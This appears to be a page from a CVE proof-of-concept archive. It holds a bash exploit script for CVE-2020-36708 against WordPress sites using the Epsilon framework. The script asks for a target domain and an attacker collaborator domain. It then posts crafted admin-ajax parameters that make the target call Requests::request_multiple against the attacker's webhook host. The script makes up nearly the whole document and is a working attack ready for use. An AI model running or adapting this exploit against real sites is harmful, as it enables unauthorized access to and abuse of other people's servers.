4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2020-36708.sh SH
#!/bin/bash

read -p "Enter target domain (e.g. target.vulnsite.com): " target
read -p "Enter collaborator/webhook domain (e.g. abc.oastify.com): " collab

curl -sS -k "https://$target/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-urlencode "action=epsilon_framework_ajax_action" \
  --data-urlencode "args[action][0]=Requests" \
  --data-urlencode "args[action][1]=request_multiple" \
  --data-urlencode "args[args][0][url]=https://$collab/wp-epsilon-poc" \
  --data-urlencode "args[args][0][method]=GET" \
  --data-urlencode "args[args][0][timeout]=3"